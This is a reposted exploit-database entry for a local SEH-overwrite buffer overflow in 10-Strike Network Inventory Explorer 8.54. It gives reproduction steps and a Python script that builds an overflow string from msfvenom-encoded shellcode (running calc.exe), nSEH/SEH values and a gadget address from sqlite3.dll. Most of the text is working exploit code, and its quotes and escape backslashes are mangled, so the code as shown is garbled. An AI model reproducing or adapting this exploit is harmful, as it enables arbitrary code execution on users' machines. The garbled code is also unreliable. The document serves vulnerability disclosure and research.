10-Strike Network Inventory Explorer 8.54 Buffer Overflow ≈ Packet Storm


# Exploit Title: 10-Strike Network Inventory Explorer 8.54 – ‘Add’ Local Buffer Overflow (SEH)
# Date: 2020-03-24
# Author: Felipe Winsnes
# Vendor Homepage: https://www.10-strike.com/
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
# Version: 8.54
# Tested on: Windows 7

# Proof of Concept:
# 1.- Run the python script « poc.py », it will create a new file « poc.txt »
# 2.- Copy the content of the new file ‘poc.txt’ to clipboard
# 3.- Open the Application
# 4.- Go to ‘Main’ or ‘Computers’
# 5.- Click upon ‘Add’
# 6.- Paste clipboard on ‘Computer’ parameter, under the title « Computer Card »
# 7.- Click « OK »
# 8.- Profit

# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Strike-Network-Inventory-Explorer-Structered-Exception-Handling-Overwrite/

import struct

# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed
# Payload size: 448 bytes

buf = b » »
buf += b »x89xe2xdaxc3xd9x72xf4x5fx57x59x49x49x49″
buf += b »x49x49x49x49x49x49x49x43x43x43x43x43x43″
buf += b »x37x51x5ax6ax41x58x50x30x41x30x41x6bx41″
buf += b »x41x51x32x41x42x32x42x42x30x42x42x41x42″
buf += b »x58x50x38x41x42x75x4ax49x39x6cx78x68x4f »
buf += b »x72x47x70x63x30x57x70x63x50x4dx59x4bx55″
buf += b »x55x61x49x50x45x34x6cx4bx50x50x36x50x4c »
buf += b »x4bx53x62x56x6cx4ex6bx33x62x44x54x4ex6b »
buf += b »x42x52x54x68x74x4fx68x37x50x4ax56x46x44″
buf += b »x71x49x6fx6ex4cx45x6cx63x51x53x4cx53x32″
buf += b »x76x4cx61x30x5ax61x58x4fx74x4dx76x61x49″
buf += b »x57x59x72x5ax52x46x32x56x37x6cx4bx30x52″
buf += b »x36x70x6cx4bx73x7ax57x4cx4cx4bx30x4cx64″
buf += b »x51x70x78x7ax43x33x78x75x51x68x51x70x51″
buf += b »x4cx4bx76x39x55x70x67x71x38x53x4ex6bx31″
buf += b »x59x66x78x38x63x45x6ax51x59x6cx4bx70x34″
buf += b »x4cx4bx57x71x59x46x45x61x59x6fx6ex4cx4b »
buf += b »x71x58x4fx66x6dx76x61x5ax67x56x58x6bx50″
buf += b »x73x45x49x66x75x53x71x6dx4cx38x37x4bx43″
buf += b »x4dx67x54x63x45x4bx54x52x78x6cx4bx73x68″
buf += b »x37x54x56x61x69x43x73x56x4cx4bx76x6cx32″
buf += b »x6bx6ex6bx61x48x65x4cx55x51x7ax73x6cx4b »
buf += b »x54x44x4ex6bx43x31x6ax70x4bx39x32x64x35″
buf += b »x74x55x74x63x6bx43x6bx75x31x72x79x73x6a »
buf += b »x56x31x59x6fx4bx50x53x6fx51x4fx43x6ax4c »
buf += b »x4bx62x32x6ax4bx4cx4dx43x6dx63x5ax76x61″
buf += b »x6ex6dx6dx55x4ex52x53x30x77x70x55x50x76″
buf += b »x30x32x48x70x31x6cx4bx50x6fx6fx77x69x6f »
buf += b »x58x55x4dx6bx4ax50x58x35x4ex42x42x76x75″
buf += b »x38x6fx56x6fx65x4dx6dx6dx4dx59x6fx39x45″
buf += b »x77x4cx76x66x73x4cx76x6ax4dx50x79x6bx4d »
buf += b »x30x70x75x37x75x6fx4bx53x77x67x63x73x42″
buf += b »x72x4fx50x6ax55x50x56x33x39x6fx39x45x45″
buf += b »x33x30x61x50x6cx70x63x34x6ex42x45x51x68″
buf += b »x31x75x65x50x41x41″

nseh = struct.pack(« <I », 0x909006EB)
seh = struct.pack(« <I », 0x61E8497A) # 0x61e8497a : pop esi # pop edi # ret | {PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.12.2 (C:Program Files10-Strike Network Inventory Explorersqlite3.dll)

buffer = « A » * 211 + nseh + seh + « A » * 20 + buf + « xff » * 200
f = open (« poc.txt », « w »)
f.write(buffer)
f.close()



Source link

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *